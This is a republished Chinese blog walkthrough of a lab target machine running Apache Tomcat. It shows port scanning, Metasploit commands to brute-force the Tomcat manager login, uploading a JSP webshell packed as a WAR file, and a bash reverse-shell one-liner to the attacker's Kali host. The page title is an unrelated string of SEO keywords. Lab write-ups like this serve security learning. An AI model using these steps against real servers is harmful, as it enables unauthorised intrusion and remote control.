您的位置:首页 > 科技 > 能源 > 建设工程合同民法典_家装设计理念_免费建立自己的网站_seo搜索引擎优化试题及答案

建设工程合同民法典_家装设计理念_免费建立自己的网站_seo搜索引擎优化试题及答案

2025/3/28 9:27:53 来源:https://blog.csdn.net/l2772513700/article/details/146507949  浏览:    关键词:建设工程合同民法典_家装设计理念_免费建立自己的网站_seo搜索引擎优化试题及答案
建设工程合同民法典_家装设计理念_免费建立自己的网站_seo搜索引擎优化试题及答案

信息收集

将靶机改为net模式,开启kali进行扫描,得到靶机ip

对靶机的端口,目录进行扫描,8080端口是 apache tomcat代理

进入8080端口,点击app出现登录窗口,弱口令没试出来,可以爆破登录窗口

查了一下,都是msf爆破【Web安全】kali渗透工具MSF以及msfconsole命令详解_kali msfconsole-CSDN博客

msfconsole
search tomcat login
use 0
show options
set STOP_ON_SUCCESS true
set RHOSTS (靶场ip)
run

登录上去后,可以找到部署war文件的位置,可以发现可以上传文件

我们将自己的jsp木马文件压缩成zip文件,然后把后缀改成war

访问木马文件,用哥斯拉连接

那么我们进行反弹shell,在kali开启监听,在虚拟终端输入命令进行反弹shell到kali上

bash -c 'bash -i>& /dev/tcp/192.168.247.131/8888 0>&1'

监听成功

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com